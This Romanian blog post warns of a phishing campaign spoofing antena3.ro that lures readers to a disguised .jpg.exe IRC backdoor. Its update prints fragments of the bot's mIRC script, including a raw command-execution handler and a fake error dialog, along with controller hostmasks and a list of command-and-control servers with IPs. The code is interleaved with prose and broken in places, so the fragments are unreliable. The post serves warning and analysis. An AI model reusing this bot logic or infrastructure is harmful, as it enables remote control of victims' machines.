![]()
Tocmai am primit un set de mailuri cu adresa de expediție ce pare a fi contact@antena3.ro
care anunță că ”Traian Băsescu demisionează”. E truc destul de bun în a
convinge utilizatorii neștiutori să dea clic pe un link care în teorie
ar duce la o poză cu expresia Elenei Udrea la aflarea veștii.
Vedeți mai jos adresa exactă de unde vine mesajul:
![]()
Băieții
care sunt în spatele atacului exploatează (destul de bine)
manifestațiile din țară încercând să mai infecteze câteva zeci/sute de
sisteme mizând pe curiozitatea utilizatorului neavizat.
De fapt, link-ul duce către un download pentru fișierul pulsetread.com/udrea-nocomment.jpg.exe
– un executabil infectat cu un backdoor ce se conectează la IRC și
probabil că acolo așteaptă comenzi ulterioare.
![]()
NU
DAȚI CLIC PE LINK ȘI MAI CU SEAMĂ NU DESCHIDEȚI EXECUTABILUL. În afara
unui backdoor nu veți găsi nimic interesant la link-ul respectiv.
În mod normal un antivirus adus la zi va detecta infecția. Kaspersky AntiVirus îl vede sub forma Backdoor.IRC.Zapchast.zwrc
Găsiți aici informații despre malware și cum să scăpați de el.
![]()
UPDATE:
Câteva informații interesante despre atac mi-au fost date de Ștefan
Tănase, Senior Security Researcher din Global Research and Analysis Team
de laKaspersky Lab.
![]()
Este un IRC bot comun, bazat pe Mirc. M-am uitat prin el și nu are nimic targetat – în afara de subiectul cu "Udrea". În rest, un IRC bot ca oricare altul. Odată rulat, va afișa un mesaj fake de eroare: msgbox "Cannot open file 'udrea-nocomment.jpg'. Acces is denied.",16,"Windows Photo Viewer Exception"Câteva din comenzile pe care le așteaptă bot-ul de IRC:
Apoi rulează un binar - daemon.exe
start %SystemRoot%\Temp\Cookies\daemon.exe - clientul de mirc.
if ($2 == ontime) { .notice $nickPrin cod există informații despre utilizatorii de Undernet ce au drepturi de control asupra bot-ului:
10Ontime
4:
2 $uptime(server,1) | halt }
if ($2 == uptime) { .notice $nick
10Uptime
4:
2 $duration($calc( $ticks / 1000)) | halt } if ($2 == cserv) { .notice $nick
6Current Server
2:
14 $server } if ($2 == msg) { .msg $3- | halt }
if ($2 == say) { .msg $chan $3- | halt }
if ($2 == me) { describe $chan $3- | halt }
if ($2 == notice) { notice $3- | halt }
if ($2 == away) { .away | .away $3- | halt }
if ($2 == join) { join $3- | who $3 | halt }
if ($2 == part) { part $3 }
if ($2 == raw) { $$3- }
if ($2 == exit) && ($level($address($nick,2)) > 2) { exit | halt }
if ($2 == part) {
n2=100:*!*@Razvy.users.undernet.orgPosibil ca Razvy, Cupid și beibe din PHTeam să profite de demonstrațiile de ieri în alt mod decât o fac cei din stradă?
n3=100:*!*@Cupid.users.undernet.org
n4=100:*!*@beibe.users.undernet.org
Servere-le la care se conectează bot-ul :
n1=FreedomSERVER:irc.thisisfreedom.net:6667GROUP:FreedomSursa: chip.ro
n2=FreedomSERVER:irc.thisisfreedom.net:6669GROUP:Freedom
n3=FreedomSERVER:my-station.us:6667GROUP:Freedom
n4=FreedomSERVER:iclimb.com:6669GROUP:Freedom
n5=BucharestSERVER:82.76.255.62:6661GROUP:Undernet
n6=BudapestSERVER:94.125.182.255:6665GROUP:Undernet
n7=DiemenSERVER:194.109.20.90:6668GROUP:Undernet
n8=TampaSERVER:208.83.20.130:6667GROUP:Undernet
n9=HamburgSERVER:95.141.29.22:6664GROUP:Undernet






0 comentarii:
Trimiteți un comentariu